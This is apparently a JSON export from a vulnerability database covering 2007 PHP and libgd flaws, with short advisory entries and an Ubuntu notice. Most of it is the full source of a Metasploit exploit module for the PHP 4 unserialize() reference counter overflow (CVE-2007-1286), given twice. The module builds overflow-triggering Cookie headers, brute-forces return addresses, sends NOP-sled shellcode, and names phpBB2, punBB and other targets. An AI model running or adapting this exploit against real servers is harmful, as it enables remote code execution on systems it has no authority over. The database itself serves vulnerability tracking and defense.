"SECURITYVULNS:DOC:16620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16620", "title": "PHP <= 5.2.1 wbmp file handling integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Buffer overflow on WBMP image parsing.", "modified": "2007-04-08T00:00:00", "published": "2007-04-08T00:00:00", "id": "SECURITYVULNS:VULN:7545", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7545", "title": "PHP gd extension readwbmp() function integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Exceptional conditions during function invocation may lead to enabling register_globals.", "modified": "2007-03-22T00:00:00", "published": "2007-03-22T00:00:00", "id": "SECURITYVULNS:VULN:7450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7450", "title": "mb_parse_str() exceptional conditions protection bypass", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "JIS fonts parsing problem in gdImageStringFTEx() function.", "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "id": "SECURITYVULNS:VULN:7131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7131", "title": "libgd graphics library code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "16-bit counter overflow leads to ability of code execution on parsing cookie.", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "SECURITYVULNS:VULN:7333", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7333", "title": "PHP unserialize() integer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Infinite loop on 64-bit platforms.", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "SECURITYVULNS:VULN:7279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7279", "title": "PHP zend_hash_init function infinite loop", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Unfiltered \r\n and \0 characters allows strings injection and header truncation.", "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "SECURITYVULNS:VULN:7491", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7491", "title": "PHP mail() function invalid characters processing", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "metasploit": [{"lastseen": "2018-10-26T21:54:07", "bulletinFamily": "exploit", "description": "This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger due the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems.", "modified": "2017-07-24T13:26:21", "published": "2007-05-07T04:48:45", "id": "MSF:EXPLOIT/MULTI/PHP/PHP_UNSERIALIZE_ZVAL_COOKIE", "href": "", "type": "metasploit", "title": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\n 'Description' => %q{\n This module exploits an integer overflow vulnerability in the unserialize()\n function of the PHP web server extension. This vulnerability was patched by\n Stefan in version 4.5.0 and applies all previous versions supporting this function.\n This particular module targets numerous web applications and is based on the proof\n of concept provided by Stefan Esser. This vulnerability requires approximately 900k\n of data to trigger due the multiple Cookie headers requirement. Since we\n are already assuming a fast network connection, we use a 2Mb block of shellcode for\n the brute force, allowing quick exploitation for those with fast networks.\n\n One of the neat things about this vulnerability is that on x86 systems, the EDI register points\n into the beginning of the hashtable string. This can be used with an egghunter to\n quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n is known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n module is more reliable across a wider range of systems.\n },\n 'Author' =>\n [\n 'hdm', # module development\n 'GML <grandmasterlogic[at]gmail.com>', # module development and debugging\n 'Stefan Esser <sesser[at]hardened-php.net>' # discovered, patched, exploited\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2007-1286'],\n ['OSVDB', '32771'],\n ['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n },\n 'Platform' => %w{ linux },\n 'Targets' =>\n [\n\n #\n # 64-bit SuSE: 0x005c0000\n # Backtrack 2.0: 0xb797a000\n # Gentoo: 0xb6900000\n #\n [ 'Linux x86 Generic',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 phpBB2',\n {\n 'DefaultCookie' => 'phpbb2mysql_data',\n 'DefaultURI' => '/phpBB2/faq.php',\n 'Signature' => /Powered\\s+by.*phpBB/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 punBB',\n {\n 'DefaultCookie' => 'punbb_cookie',\n 'DefaultURI' => '/index.php',\n 'Signature' => /Powered\\s+by.*PunBB/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 WWWThreads',\n {\n 'DefaultCookie' => 'forum_cookie',\n 'DefaultURI' => '/index.php',\n 'Signature' => /Powered\\s+by.*WWWThreads/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 Deadman Redirect',\n {\n 'DefaultCookie' => 'authcookie',\n 'DefaultURI' => '/dmr/dmr.php',\n 'Signature' => /document\\.f\\.userdata\\.focus/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 PhpWebGallery',\n {\n 'DefaultCookie' => 'pwg_remember',\n 'DefaultURI' => '/phpwebgallery/index.php',\n 'Signature' => /Powered\\s+by.*phpwebgallery/msi,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 Ariadne-CMS',\n {\n 'DefaultCookie' => 'ARCookie',\n 'DefaultURI' => '/ariadne/loader.php/',\n 'Signature' => /Ariadne is free software/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 ProMA',\n {\n 'DefaultCookie' => 'proma',\n 'DefaultURI' => '/proma/index.php',\n 'Signature' => /Change Account Information/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 eGroupware',\n {\n 'DefaultCookie' => 'eGW_remember',\n 'DefaultURI' => '/egroupware/login.php',\n 'Signature' => /www.egroupware.org/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ]\n ],\n 'DisclosureDate' => 'Mar 04 2007'))\n\n register_options(\n [\n OptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\n OptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\n ])\n end\n\n\n def check\n vprint_status(\"Checking for a vulnerable PHP version...\")\n\n #\n # Pick the URI and Cookie name\n #\n cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\n uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']\n\n if(not cookie_name)\n fail_with(Failure::Unknown, \"The COOKIENAME option must be set\")\n end\n\n if(not uri_path)\n fail_with(Failure::Unknown, \"The URI option must be set\")\n end\n\n res = send_request_cgi({\n 'uri'\t\t => uri_path,\n 'method'\t => 'GET'\n }, 5)\n\n php_bug = false\n\n if (not res)\n vprint_status(\"No response from the server\")\n return Exploit::CheckCode::Unknown # User should try again\n end\n\n http_fingerprint({ :response => res }) # check method\n\n if (res.code != 200)\n vprint_status(\"The server returned #{res.code} #{res.message}\")\n return Exploit::CheckCode::Safe\n end\n\n if (\n (res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\n (res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\n )\n\n php_raw = $1\n php_ver = php_raw.split('.')\n\n if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\n vprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\n php_bug = true\n else\n vprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\n return Exploit::CheckCode::Safe\n end\n end\n\n # Detect the phpBB cookie name\n if res.get_cookies =~ /(.*)_(sid|data)=/\n vprint_status(\"The server may require a cookie name of '#{$1}_data'\")\n end\n\n if(target and target['Signature'])\n if (res.body and res.body.match(target['Signature']))\n vprint_status(\"Detected target #{target.name}\")\n else\n vprint_status(\"Did not detect target #{target.name}\")\n end\n\n end\n\n return php_bug ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected\n end\n\n\n def brute_exploit(target_addrs)\n\n zvalref = encode_semis('i:0;R:2;')\n\n#\n# Use this if we decide to do 'jmp edi' returns vs brute force\n#\n=begin\n # Linux specific egg-hunter\n tagger = \"\\x90\\x50\\x90\\x50\"\n hunter =\n \"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\n \"\\x3c\\xf2\\x74\\xf1\\xb8\" +\n tagger +\n \"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\n\n egghunter = \"\\xcc\" * 39\n egghunter[0, hunter.length] = hunter\n\n hashtable = \"\\xcc\" * 39\n hashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\n\n hashtable[20, 4] = [target_addrs['Ret']].pack('V')\n hashtable[32, 4] = [target_addrs['Ret']].pack('V')\n=end\n\n #\n # Just brute-force addresses for now\n #\n tagger = ''\n egghunter = rand_text_alphanumeric(39)\n hashtable = rand_text_alphanumeric(39)\n hashtable[20, 4] = [target_addrs['Ret']].pack('V')\n hashtable[32, 4] = [target_addrs['Ret']].pack('V')\n\n\n #\n # Pick the URI and Cookie name\n #\n cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\n uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']\n\n if(not cookie_name)\n fail_with(Failure::Unknown, \"The COOKIENAME option must be set\")\n end\n\n if(not uri_path)\n fail_with(Failure::Unknown, \"The URI option must be set\")\n end\n\n # Generate and reuse the original buffer to save CPU\n if (not @saved_cookies)\n\n # Building the malicious request\n print_status(\"Creating the request...\")\n\n # Create the first cookie header to get this started\n cookie_fun = \"Cookie: #{cookie_name}=\"\n cookie_fun << Rex::Text.uri_encode(\n 'a:100000:{s:8:\"' +\n rand_text_alphanumeric(8) +\n '\";a:3:{s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";a:1:{s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";i:0;}s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";'+\n 'i:0;s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";i:0;}'\n )\n cookie_fun << zvalref * 500\n cookie_fun << Rex::Text.uri_encode('s:2:\"')\n cookie_fun << \"\\r\\n\"\n\n refcnt = 1000\n refmax = 65535\n\n # Keep adding cookie headers...\n while(refcnt < refmax)\n\n chead = 'Cookie: ';\n chead << encode_semis('\";N;')\n\n # Stay within the 8192 byte limit\n 0.upto(679) do |i|\n break if refcnt >= refmax\n refcnt += 1\n\n chead << zvalref\n end\n chead << encode_semis('s:2:\"')\n cookie_fun << chead + \"\\r\\n\"\n end\n\n # The final header, including the hashtable with return address\n cookie_fun << \"Cookie: \"\n cookie_fun << Rex::Text.uri_encode('\";N;')\n cookie_fun << zvalref * 500\n\n @saved_cookies = cookie_fun\n end\n\n # Generate and reuse the payload to save CPU time\n if (not @saved_payload)\n @saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\n end\n\n cookie_addrs = Rex::Text.uri_encode(\n 's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\n ) + \"\\r\\n\"\n\n print_status(\"Trying address 0x%.8x...\" % target_addrs['Ret'])\n res = send_request_cgi({\n 'uri'\t\t => uri_path,\n 'method'\t => 'POST',\n 'raw_headers' => @saved_cookies + cookie_addrs,\n 'data' => @saved_payload\n }, 1)\n\n\n if res\n failed = false\n\n print_status(\"Received a response: #{res.code} #{res.message}\")\n\n if (res.code != 200)\n print_error(\"The server returned a non-200 response, indicating that the exploit failed\")\n failed = true\n end\n\n if (not failed and (res.body and res.body.length > 0))\n print_error(\"The server returned a real response, indicating that the exploit failed\")\n failed = true\n end\n\n if (failed)\n print_status(\"Please verify the URI and COOKIENAME parameters.\")\n print_line('')\n print_line(\"*\" * 40)\n print_line(res.body)\n print_line(\"*\" * 40)\n print_line('')\n\n fail_with(Failure::Unknown, \"Exploit settings are probably wrong\")\n end\n else\n print_status(\"No response from the server\")\n end\n\n end\n\n def encode_semis(str)\n str.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/php/php_unserialize_zval_cookie.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:10", "bulletinFamily": "exploit", "description": "", "modified": "2009-10-27T00:00:00", "published": "2009-10-27T00:00:00", "href": "https://packetstormsecurity.com/files/82269/PHP-4-unserialize-ZVAL-Reference-Counter-Overflow.html", "id": "PACKETSTORM:82269", "type": "packetstorm", "title": "PHP 4 unserialize() ZVAL Reference Counter Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)', \n'Description' => %q{ \nThis module exploits an integer overflow vulnerability in the unserialize() \nfunction of the PHP web server extension. This vulnerability was patched by \nStefan in version 4.5.0 and applies all previous versions supporting this function. \nThis particular module targets numerous web applications and is based on the proof \nof concept provided by Stefan Esser. This vulnerability requires approximately 900k \nof data to trigger due the multiple Cookie headers requirement. Since we \nare already assuming a fast network connection, we use a 2Mb block of shellcode for \nthe brute force, allowing quick exploitation for those with fast networks. \n \nOne of the neat things about this vulnerability is that on x86 systems, the EDI register points \ninto the beginning of the hashtable string. This can be used with an egghunter to \nquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction \nis known. The EDI method is faster, but the bandwidth-intensive brute force used by this \nmodule is more reliable across a wider range of systems. \n \n \n}, \n'Author' => \n[ \n'hdm', # module development \n'GML <grandmasterlogic [at] gmail.com>', # module development and debugging \n'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-1286'], \n['OSVDB', '32771'], \n['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n}, \n'Targets' => \n[ \n \n# \n# 64-bit SuSE: 0x005c0000 \n# Backtrack 2.0: 0xb797a000 \n# Gentoo: 0xb6900000 \n# \n[ 'Linux x86 Generic', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 phpBB2', \n{ \n'DefaultCookie' => 'phpbb2mysql_data', \n'DefaultURI' => '/phpBB2/faq.php', \n'Signature' => /Powered\\s+by.*phpBB/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 punBB', \n{ \n'DefaultCookie' => 'punbb_cookie', \n'DefaultURI' => '/index.php', \n'Signature' => /Powered\\s+by.*PunBB/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 WWWThreads', \n{ \n'DefaultCookie' => 'forum_cookie', \n'DefaultURI' => '/index.php', \n'Signature' => /Powered\\s+by.*WWWThreads/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 Deadman Redirect', \n{ \n'DefaultCookie' => 'authcookie', \n'DefaultURI' => '/dmr/dmr.php', \n'Signature' => /document\\.f\\.userdata\\.focus/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 PhpWebGallery', \n{ \n'DefaultCookie' => 'pwg_remember', \n'DefaultURI' => '/phpwebgallery/index.php', \n'Signature' => /Powered\\s+by.*phpwebgallery/msi, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 Ariadne-CMS', \n{ \n'DefaultCookie' => 'ARCookie', \n'DefaultURI' => '/ariadne/loader.php/', \n'Signature' => /Ariadne is free software/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 ProMA', \n{ \n'DefaultCookie' => 'proma', \n'DefaultURI' => '/proma/index.php', \n'Signature' => /Change Account Information/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 eGroupware', \n{ \n'DefaultCookie' => 'eGW_remember', \n'DefaultURI' => '/egroupware/login.php', \n'Signature' => /www.egroupware.org/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n] \n], \n'DisclosureDate' => 'Mar 04 2007')) \n \nregister_options( \n[ \nOptString.new('URI', [false, \"The path to vulnerable PHP script\"]), \nOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"]) \n], self.class) \nend \n \n \ndef check \nprint_status(\"Checking for a vulnerable PHP version...\") \n \n# \n# Pick the URI and Cookie name \n# \ncookie_name = datastore['COOKIENAME'] || target['DefaultCookie'] \nuri_path = datastore['URI'] || target['DefaultURI'] \n \nif(not cookie_name) \nraise RuntimeError, \"The COOKIENAME option must be set\" \nend \n \nif(not uri_path) \nraise RuntimeError, \"The URI option must be set\" \nend \n \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'GET' \n}, 5) \n \nphp_bug = false \n \nif (not res) \nprint_status(\"No response from the server\") \nreturn Exploit::CheckCode::Safe \nend \n \nif (res.code != 200) \nprint_status(\"The server returned #{res.code} #{res.message}\") \nreturn Exploit::CheckCode::Safe \nend \n \nif ( \n(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or \n(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/) \n) \n \nphp_raw = $1 \nphp_ver = php_raw.split('.') \n \nif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5) \nprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\") \nphp_bug = true \nelse \nprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\") \nreturn Exploit::CheckCode::Safe \nend \nend \n \n# Detect the phpBB cookie name \nif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) \nprint_status(\"The server may require a cookie name of '#{$1}_data'\") \nend \n \nif(target and target['Signature']) \nif (res.body and res.body.match(target['Signature'])) \nprint_status(\"Detected target #{target.name}\") \nelse \nprint_status(\"Did not detect target #{target.name}\") \nend \n \nend \n \nreturn php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears \nend \n \n \ndef brute_exploit(target_addrs) \n \nzvalref = encode_semis('i:0;R:2;') \n \n# \n# Use this if we decide to do 'jmp edi' returns vs brute force \n# \n=begin \n# Linux specific egg-hunter \ntagger = \"\\x90\\x50\\x90\\x50\" \nhunter = \n\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" + \n\"\\x3c\\xf2\\x74\\xf1\\xb8\" + \ntagger + \n\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\" \n \negghunter = \"\\xcc\" * 39 \negghunter[0, hunter.length] = hunter \n \nhashtable = \"\\xcc\" * 39 \nhashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes \n \nhashtable[20, 4] = [target_addrs['Ret']].pack('V') \nhashtable[32, 4] = [target_addrs['Ret']].pack('V') \n=end \n \n# \n# Just brute-force addresses for now \n# \ntagger = '' \negghunter = rand_text_alphanumeric(39) \nhashtable = rand_text_alphanumeric(39) \nhashtable[20, 4] = [target_addrs['Ret']].pack('V') \nhashtable[32, 4] = [target_addrs['Ret']].pack('V') \n \n \n# \n# Pick the URI and Cookie name \n# \ncookie_name = datastore['COOKIENAME'] || target['DefaultCookie'] \nuri_path = datastore['URI'] || target['DefaultURI'] \n \nif(not cookie_name) \nraise RuntimeError, \"The COOKIENAME option must be set\" \nend \n \nif(not uri_path) \nraise RuntimeError, \"The URI option must be set\" \nend \n \n# Generate and reuse the original buffer to save CPU \nif (not @saved_cookies) \n \n# Building the malicious request \nprint_status(\"Creating the request...\") \n \n# Create the first cookie header to get this started \ncookie_fun = \"Cookie: #{cookie_name}=\" \ncookie_fun << Rex::Text.uri_encode( \n'a:100000:{s:8:\"' + \nrand_text_alphanumeric(8) + \n'\";a:3:{s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";a:1:{s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";i:0;}s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";'+ \n'i:0;s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";i:0;}' \n) \ncookie_fun << zvalref * 500 \ncookie_fun << Rex::Text.uri_encode('s:2:\"') \ncookie_fun << \"\\r\\n\" \n \nrefcnt = 1000 \nrefmax = 65535 \n \n# Keep adding cookie headers... \nwhile(refcnt < refmax) \n \nchead = 'Cookie: '; \nchead << encode_semis('\";N;') \n \n# Stay within the 8192 byte limit \n0.upto(679) do |i| \nbreak if refcnt >= refmax \nrefcnt += 1 \n \nchead << zvalref \nend \nchead << encode_semis('s:2:\"') \ncookie_fun << chead + \"\\r\\n\" \nend \n \n# The final header, including the hashtable with return address \ncookie_fun << \"Cookie: \" \ncookie_fun << Rex::Text.uri_encode('\";N;') \ncookie_fun << zvalref * 500 \n \n@saved_cookies = cookie_fun \nend \n \n# Generate and reuse the payload to save CPU time \nif (not @saved_payload) \n@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256) \nend \n \ncookie_addrs = Rex::Text.uri_encode( \n's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;' \n) + \"\\r\\n\" \n \nprint_status(\"Trying address 0x%.8x...\" % target_addrs['Ret']) \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'raw_headers' => @saved_cookies + cookie_addrs, \n'data' => @saved_payload \n}, 1) \n \n \nif res \nfailed = false \n \nprint_status(\"Received a response: #{res.code} #{res.message}\") \n \nif (res.code != 200) \nprint_status(\"The server returned a non-200 response, indicating that the exploit failed.\") \nfailed = true \nend \n \nif (not failed and (res.body and res.body.length > 0)) \nprint_status(\"The server returned a real response, indicating that the exploit failed.\") \nfailed = true \nend \n \nif (failed) \nprint_status(\"Please verify the URI and COOKIENAME parameters.\") \nprint_line('') \nprint_line(\"*\" * 40) \nprint_line(res.body) \nprint_line(\"*\" * 40) \nprint_line('') \n \nraise RuntimeError, \"Exploit settings are probably wrong\" \nend \nelse \nprint_status(\"No response from the server\") \nend \n \nend \n \ndef encode_semis(str) \nstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) } \nend \n \nend \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82269/php_unserialize_zval_cookie.rb.txt"}], "ubuntu": [{"lastseen": "2019-01-29T20:33:08", "bulletinFamily": "unix", "description": "A buffer overflow was discovered in libgd2\u2019s font renderer. By tricking an application using libgd2 into rendering a specially crafted string with a JIS encoded font, a remote attacker could read heap memory or crash the application, leading to a denial of service. (CVE-2007-0455)\n\nXavier Roche discovered that libgd2 did not correctly validate PNG callback results. If an application were tricked into processing a specially crafted PNG image, it would monopolize CPU resources. Since libgd2 is often used in PHP and Perl web applications, this could lead to a remote denial of service. (CVE-2007-2756)", "modified": "2007-06-12T00:00:00", "published": "2007-06-12T00:00:00", "id": "USN-473-1", "href": "https://usn.ubuntu.com/473-1/", "title": "libgd2 vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}